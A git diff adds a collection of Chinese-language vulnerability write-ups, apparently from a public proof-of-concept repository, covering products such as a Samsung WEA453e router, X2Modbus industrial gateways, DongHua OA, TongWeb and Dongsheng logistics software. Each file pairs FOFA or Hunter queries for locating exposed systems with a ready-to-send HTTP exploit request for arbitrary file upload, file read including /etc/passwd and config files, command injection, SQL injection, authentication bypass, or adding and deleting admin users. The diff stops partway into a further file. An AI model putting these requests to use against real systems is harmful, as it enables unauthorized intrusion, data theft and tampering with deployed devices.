diff --git a/万能门店小程序管理系统onepic_uploade任意文件上传漏洞.md b/万能门店小程序管理系统onepic_uploade任意文件上传漏洞.md new file mode 100644 index 0000000..17330f9 --- /dev/null +++ b/万能门店小程序管理系统onepic_uploade任意文件上传漏洞.md @@ -0,0 +1,31 @@ +# 万能门店小程序管理系统onepic_uploade任意文件上传漏洞 + +万能门店小程序DIY建站无限独立版非微擎应用,独立版是基于国内很火的ThinkPHP5框架开发的,适用于各行各业小程序、企业门店小程序,万能门店小程序管理系统onepic_uploade任意文件上传漏洞 + +## fofa + +```javascript +"/comhome/cases/index.html" +``` + +## poc + +```javascript +POST /comadmin/Remote/onepic_uploade?file=file HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBiKyL9D0p5OtH5zz +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundaryBiKyL9D0p5OtH5zz +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + +<?php phpinfo();unlink(__FILE__);?> +------WebKitFormBoundaryBiKyL9D0p5OtH5zz-- +``` + +![image-20241128164739396](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281647503.png) \ No newline at end of file diff --git a/万豪娱乐存在任意文件读取漏洞 2.md b/万豪娱乐存在任意文件读取漏洞 2.md new file mode 100644 index 0000000..f0ca97e --- /dev/null +++ b/万豪娱乐存在任意文件读取漏洞 2.md 
@@ -0,0 +1,22 @@ +# 万豪娱乐存在任意文件读取漏洞 + +# 一、漏洞简介 +万豪娱乐存在任意文件读取漏洞 + +# <font style="color:rgb(51, 51, 51);">二、资产测绘</font> ++ fofa`"Public/Js/Mobile" && country="CN"` ++ 特征 + +![1732603661176-cb3a2a28-7d6a-40d4-9d80-fd111ca79567.png](./img/eaMHkXnPwwFbw3wO/1732603661176-cb3a2a28-7d6a-40d4-9d80-fd111ca79567-382774.png) + +# 三、漏洞复现 +```plain +/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993 +``` + +<font style="color:rgb(52, 73, 94);">使用poc访问后,接着访问 /public/gamelist/1993.jpg 的图片,保存下来就是读取到的内容</font> + + + +> 更新: 2024-11-27 10:00:05 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ifd65o9r8hm8m0ac> \ No newline at end of file diff --git a/万豪娱乐存在任意文件读取漏洞.md b/万豪娱乐存在任意文件读取漏洞.md new file mode 100644 index 0000000..300fa2e --- /dev/null +++ b/万豪娱乐存在任意文件读取漏洞.md @@ -0,0 +1,20 @@ +# 万豪娱乐存在任意文件读取漏洞 + +万豪娱乐存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +"Public/Js/Mobile" && country="CN" +``` + +![image-20240928131302737](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409281313798.png) + +## poc + +```javascript +/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993 +``` + +**使用poc访问后,接着访问 /public/gamelist/1993.jpg 的图片,保存下来就是读取到的内容** + diff --git a/三星路由器WLANAP任意文件读取漏洞.md b/三星路由器WLANAP任意文件读取漏洞.md new file mode 100644 index 0000000..66d1495 --- /dev/null +++ b/三星路由器WLANAP任意文件读取漏洞.md 
@@ -0,0 +1,32 @@ +# 三星路由器WLAN AP任意文件读取漏洞 + +# 一、漏洞简介 +三星 WLAN AP WEA453e路由器存在任意文件读取漏洞,可在未授权的情况下获取敏感信息。 + +# 二、影响版本 ++ 三星 WLAN AP WEA453e路由器 + +# 三、资产测绘 ++ hunter`web.title="Samsung WLAN AP"` ++ 特征 + +![1699981974720-33031d9c-1da8-4cf7-87e1-1b3f1b65341d.png](./img/MnDBMhl-Vf5EcH4Y/1699981974720-33031d9c-1da8-4cf7-87e1-1b3f1b65341d-129492.png) + +# 四、漏洞复现 +```plain +GET /(download)/etc/passwd HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1699982107952-6d999eff-c332-4c61-8047-73509df4ff1b.png](./img/MnDBMhl-Vf5EcH4Y/1699982107952-6d999eff-c332-4c61-8047-73509df4ff1b-435942.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ypkfb8s12ng42izh> \ No newline at end of file diff --git a/三星路由器WLANAP远程命令执行漏洞.md b/三星路由器WLANAP远程命令执行漏洞.md new file mode 100644 index 0000000..ec79050 --- /dev/null +++ b/三星路由器WLANAP远程命令执行漏洞.md 
@@ -0,0 +1,36 @@ +# 三星路由器WLAN AP 远程命令执行漏洞 + +# 一、漏洞简介 +三星 WLAN AP WEA453e路由器存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限。 + +# 二、影响版本 ++ 三星 WLAN AP WEA453e路由器 + +# 三、资产测绘 ++ hunter`web.title="Samsung WLAN AP"` ++ 特征 + +![1699981974720-33031d9c-1da8-4cf7-87e1-1b3f1b65341d.png](./img/WlFtd27uvNlv3_yd/1699981974720-33031d9c-1da8-4cf7-87e1-1b3f1b65341d-028838.png) + +# 四、漏洞复现 +```plain +POST /(download)/tmp/a.txt HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 36 + +command1=shell:ls | dd of=/tmp/a.txt +``` + +![1699982002400-dfea75e4-b2c9-4cb8-8d27-d9045ae51bcd.png](./img/WlFtd27uvNlv3_yd/1699982002400-dfea75e4-b2c9-4cb8-8d27-d9045ae51bcd-101621.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ae6xqzhcp3o4cl3m> \ No newline at end of file diff --git a/三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞.md b/三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞.md new file mode 100644 index 0000000..388ff52 --- /dev/null +++ b/三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞.md 
@@ -0,0 +1,23 @@ +# 三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞 + +三汇SMG网关管理软件 SMGSuperAdmin 配置文件存在信息泄露漏洞,未经身份认证的攻击者可获取用户名密码等敏感信息,使系统处于极不安全状态。 + +## fofa + +```javascript +app="Synway-网关管理软件" +``` + +## poc + +```javascript +GET /Config/SMGSuperAdmin.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![image-20241211213513890](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112135943.png) \ No newline at end of file diff --git a/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 2.md b/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 2.md new file mode 100644 index 0000000..7fee01c --- /dev/null +++ b/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 2.md @@ -0,0 +1,23 @@ +# 上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 +上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发,在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时,公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验,是行业领先的新一代信息安全产品供应商,目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品。上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 + +## fofa +```javascript +body="Antasys" +``` + +## poc +```javascript +GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1 +Host: +Priority: u=0, i +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: PHPSESSID=515a7b9608e8a01fd03889ccf28bf590 +Upgrade-Insecure-Requests: 1 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a.png) + diff --git a/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md b/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md new file mode 100644 index 0000000..ff12fc6 --- /dev/null +++ b/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md 
@@ -0,0 +1,34 @@ +# 上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 + +# 一、漏洞简介 +上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发,在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时,公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验,是行业领先的新一代信息安全产品供应商,目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品。上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 + +# 二、影响版本 ++ 上海汉塔网络科技有限公司上网行为管理系统 + +# 三、资产测绘 ++ fofa`body="Antasys"` ++ 特征 + +![1733819382185-43df4414-69c6-45b9-a210-635997768cc0.png](./img/g30UhvPbU8YEnkZ_/1733819382185-43df4414-69c6-45b9-a210-635997768cc0-368560.png) + +# 四、漏洞复现 +```java +GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1 +Host: +Priority: u=0, i +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: PHPSESSID=515a7b9608e8a01fd03889ccf28bf590 +Upgrade-Insecure-Requests: 1 + +``` + +![1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a.png](./img/g30UhvPbU8YEnkZ_/1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a-437220.png) + + + +> 更新: 2024-12-20 14:54:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yw165400gwggwvav> \ No newline at end of file diff --git a/上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露.md b/上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露.md new file mode 100644 index 0000000..09df9c7 --- /dev/null +++ b/上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露.md 
@@ -0,0 +1,36 @@ +# 上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露 + +# 一、漏洞简介 +X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关, 这里的X代表各家不同的通信协议, 2是To的谐音表示转换, Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置,转成标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网关。X2Modbus网关GetUserList接口存在一个信息泄漏漏洞,使得未经授权的用户或攻击者可以获取管理员登录信息。 + +# 二、影响版本 ++ X2Modbus + +# 三、资产测绘 ++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"` ++ 特征 + +![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/5pAm6LDi9QkvfYif/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-178259.png) + +# 四、漏洞复现 +```java +POST /soap/GetUserList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 56 + +CmpWc= +``` + +![1712507467332-2db34223-b5c6-42d5-bd22-5afb39b57c72.png](./img/5pAm6LDi9QkvfYif/1712507467332-2db34223-b5c6-42d5-bd22-5afb39b57c72-368876.png) + + + +> 更新: 2024-04-16 16:50:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/twhz9rc6wex3xe15> \ No newline at end of file diff --git a/上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露.md b/上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露.md new file mode 100644 index 0000000..55a83d6 --- /dev/null +++ b/上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露.md 
@@ -0,0 +1,46 @@ +# 上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露 + +# 一、漏洞简介 +X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关, 这里的X代表各家不同的通信协议, 2是To的谐音表示转换, Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置,转成标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网关。X2Modbus网关GetUser接口存在一个信息泄漏漏洞,使得未经授权的用户或攻击者可以获取管理员登录信息。 + +# 二、影响版本 ++ X2Modbus + +# 三、资产测绘 ++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"` ++ 特征 + +![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/EVgnPN6fawjgwB7g/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-622823.png) + +# 四、漏洞复现 +```java +POST /soap/GetUser HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 56 + +<GetUser><User Name="admin" Password="admin"/></GetUser> +``` + +![1710416390196-3387ee8a-9cdd-424f-bc3e-7b2d914750c2.png](./img/EVgnPN6fawjgwB7g/1710416390196-3387ee8a-9cdd-424f-bc3e-7b2d914750c2-249481.png) + +登录入口 + +```java +/login.html +``` + +![1710416447837-d287970f-4360-49a1-bebc-bd4bc9354b0f.png](./img/EVgnPN6fawjgwB7g/1710416447837-d287970f-4360-49a1-bebc-bd4bc9354b0f-768042.png) + +[X2Modbus-getuser-info.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713257450749-41ffa537-94d2-4a1a-acf8-8d523ae4e463.yaml) + + + +> 更新: 2024-04-16 16:50:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ciccosqccoem25bz> \ No newline at end of file diff --git a/上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞.md b/上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞.md new file mode 100644 index 0000000..3774fa3 --- /dev/null +++ b/上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞.md 
@@ -0,0 +1,45 @@ +# 上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞 + +# 一、漏洞简介 +X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关, 这里的X代表各家不同的通信协议, 2是To的谐音表示转换, Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置,转成标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网关。上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞 + +# 二、影响版本 ++ X2Modbus + +# 三、资产测绘 ++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"` ++ 特征 + +![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/wPHoPD3sv_JhVtmu/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-219366.png) + +# 四、漏洞复现 +删除前账号 + +![1712507909745-a45f3985-9d5c-40e6-939d-c770d21daee8.png](./img/wPHoPD3sv_JhVtmu/1712507909745-a45f3985-9d5c-40e6-939d-c770d21daee8-356690.png) + +```java +POST /soap/DeleteUser HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: application/xml, text/xml, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: text/xml; charset=utf-8 +X-Requested-With: XMLHttpRequest +Content-Length: 39 +Connection: close +Cookie: language=zh-cn; language=zh-cn + +delete from userid where username='stc' +``` + +![1712507935042-e1380807-910e-4d76-b5c7-4e2f0af05c76.png](./img/wPHoPD3sv_JhVtmu/1712507935042-e1380807-910e-4d76-b5c7-4e2f0af05c76-899725.png) + +删除后 + +![1712507955869-61cca64e-db36-4d80-aaed-2f02c6bfd456.png](./img/wPHoPD3sv_JhVtmu/1712507955869-61cca64e-db36-4d80-aaed-2f02c6bfd456-979986.png) + + + +> 更新: 2024-04-16 16:50:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gqtttrccg5d19xuw> \ No newline at end of file diff --git a/上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞.md b/上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞.md new file mode 100644 index 0000000..795bdb4 --- /dev/null +++ b/上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞.md 
@@ -0,0 +1,42 @@ +# 上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞 + +# 一、漏洞简介 +X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关, 这里的X代表各家不同的通信协议, 2是To的谐音表示转换, Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置,转成标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网关。上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞 + +# 二、影响版本 ++ X2Modbus + +# 三、资产测绘 ++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"` ++ 特征 + +![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/ypZ9XWVltXmWxcJb/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-329773.png) + +# 四、漏洞复现 +```java +POST /soap/AddUser HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: application/xml, text/xml, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: text/xml; charset=utf-8 +X-Requested-With: XMLHttpRequest +Content-Length: 111 +Connection: close +Referer: +Cookie: language=zh-cn; language=zh-cn + +insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('stc','stc123456','1','2024-4-8','0:31:43') +``` + +![1712507596517-ebcb5e1f-fb34-499d-8d66-6f1190d8f714.png](./img/ypZ9XWVltXmWxcJb/1712507596517-ebcb5e1f-fb34-499d-8d66-6f1190d8f714-655700.png) + +使用添加的账户`stc/stc`登录系统 + +![1712507789057-5844ddbc-3b9b-4941-83bd-4af254f8508a.png](./img/ypZ9XWVltXmWxcJb/1712507789057-5844ddbc-3b9b-4941-83bd-4af254f8508a-197429.png) + + + +> 更新: 2024-04-16 16:50:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lyagwfg3rha3y0xp> \ No newline at end of file diff --git a/上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞.md b/上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞.md new file mode 100644 index 0000000..20cd01f --- /dev/null +++ b/上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞.md 
@@ -0,0 +1,27 @@ +# 上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞 + +# 一、漏洞简介 +X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关, 这里的X代表各家不同的通信协议, 2是To的谐音表示转换, Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置,转成标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网关。上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞,<font style="color:rgba(0, 0, 0, 0.9);">无需登录,直接访问后台管理首页即可获得80%的后台管理权限</font> + +# 二、影响版本 ++ X2Modbus + +# 三、资产测绘 ++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"` ++ 特征 + +![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/Qbxicae7Ue6yATdD/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-534188.png) + +# 四、漏洞复现 +<font style="color:rgba(0, 0, 0, 0.9);">若是复现不成功,说明增加了部分鉴权,可以在cookie增加username=admin的项也可直接绕过登录界面。</font> + +```java +/index.html +``` + +![1712507272404-8ed88b77-7c04-4570-ab58-bf989e87d870.png](./img/Qbxicae7Ue6yATdD/1712507272404-8ed88b77-7c04-4570-ab58-bf989e87d870-492254.png) + + + +> 更新: 2024-04-16 16:50:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gls8bg23feb5hiu7> \ No newline at end of file diff --git a/东华医疗协同办公系统connector接口处存在任意文件上传漏洞.md b/东华医疗协同办公系统connector接口处存在任意文件上传漏洞.md new file mode 100644 index 0000000..505d537 --- /dev/null +++ b/东华医疗协同办公系统connector接口处存在任意文件上传漏洞.md 
@@ -0,0 +1,49 @@ +# 东华医疗协同办公系统 connector接口处存在任意文件上传漏洞 + +# 一、漏洞简介 +东华oa协同办公 (DHCIOA)选用B/S结构的作业模式,以个性化效芳的门户为基础,以消息传递、信息同享、公函、作业流处理技能为中心,以先进老练的计算机和通讯技能为首要手法,供给内部网络之间的信息沟通,有效处理、和谐各部分之间的作业,提高文件处理的精确性、及时性和科学性,为企事业/政府机关单位完成无纸化作业供给完整的软件支撑,全面提高作业效率。东华医疗协同办公系统 connector接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +# 二、影响版本 ++ 东华医疗协同办公系统 + +# 三、资产测绘 ++ Hunter`web.body="/skin/charmBlue/css/dialog.css"` ++ 特征 + +![1705157130503-f3fa0a36-6d9a-4ef8-be4c-c35f8dc03239.png](./img/gO9SKq3KWNRMPZ_M/1705157130503-f3fa0a36-6d9a-4ef8-be4c-c35f8dc03239-510859.png) + +# 四、漏洞复现 +```http +POST /common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=&CurrentFolder=/ HTTP/1.1 +Host: +Cookie: JSESSIONID=17A17E4D9E4E38B72D650895AFF7D1DF +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1qdEWTI01cj5BLV +Connection: close +Content-Length: 292 + +------WebKitFormBoundaryt1qdEWTI01cj5BLV +Content-Disposition: form-data; name="NewFile"; filename="stc.jsp" +Content-Type: image/jpeg + +123good +------WebKitFormBoundaryt1qdEWTI01cj5BLV +Content-Disposition: form-data; name="Submit" + +upload +------WebKitFormBoundaryt1qdEWTI01cj5BLV-- +``` + +![1705157687374-29e624d3-24b5-4052-a3b7-9c8c877a6e28.png](./img/gO9SKq3KWNRMPZ_M/1705157687374-29e624d3-24b5-4052-a3b7-9c8c877a6e28-024117.png) + +上传文件位置 + +```http +/common/FCKeditor/UserFiles/stc.jsp +``` + +![1705157714589-d5cc4aa8-dc1b-42db-9589-640aba4960d2.png](./img/gO9SKq3KWNRMPZ_M/1705157714589-d5cc4aa8-dc1b-42db-9589-640aba4960d2-666968.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yc0w19lqn3qt4ege> \ No newline at end of file diff --git a/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md b/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md new file mode 100644 index 0000000..ce7011c --- /dev/null +++ b/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md 
@@ -0,0 +1,19 @@ +# 东华医疗协同办公系统templateFile存在任意文件下载漏洞 + +东华医疗协同办公系统 templateFile 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```yaml +body="东华医疗协同办公系统" +``` + +## poc + +```java +GET /common/templateFile?template_name=../../WEB-INF/web.xml HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408162053596.png) \ No newline at end of file diff --git a/东方通upload接口存在任意文件上传漏洞.md b/东方通upload接口存在任意文件上传漏洞.md new file mode 100644 index 0000000..0ee72e8 --- /dev/null +++ b/东方通upload接口存在任意文件上传漏洞.md @@ -0,0 +1,37 @@ +# 东方通upload接口存在任意文件上传漏洞 + +东方通upload接口存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +header="TongWeb Server" || banner="Server: TongWeb Server" +``` + +## poc + +```javascript +POST /heimdall/deploy/upload?method=upload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 +Connection: keep-alive +Content-Length: 396 +Accept: */* +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs + +------WebKitFormBoundary8UaANmWAgM4BqBSsContent-Disposition: form-data; name="file"; filename="../../applications/console/css/12462332j12.jsp" + +123456 +------WebKitFormBoundary8UaANmWAgM4BqBSs-- +``` + +文件路径`/console/css/12462332j12.jsp` + +![3defeacdea561cbf5f9437781d48707d](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409251124922.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/5YXeW7rlQ17Kz-6MvrzzKA \ No newline at end of file diff --git a/东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞.md b/东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..3324ff5 --- /dev/null +++ b/东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞.md 
@@ -0,0 +1,22 @@ +## 东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞 + +东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息。 + +## fofa + +```javascript +body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css" +``` + +## poc + +```javascript +GET /FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0)Firefox/129.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![image-20241106172104100](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061721169.png) diff --git a/东胜物流软件CertUpload文件上传漏洞.md b/东胜物流软件CertUpload文件上传漏洞.md new file mode 100644 index 0000000..c01818d --- /dev/null +++ 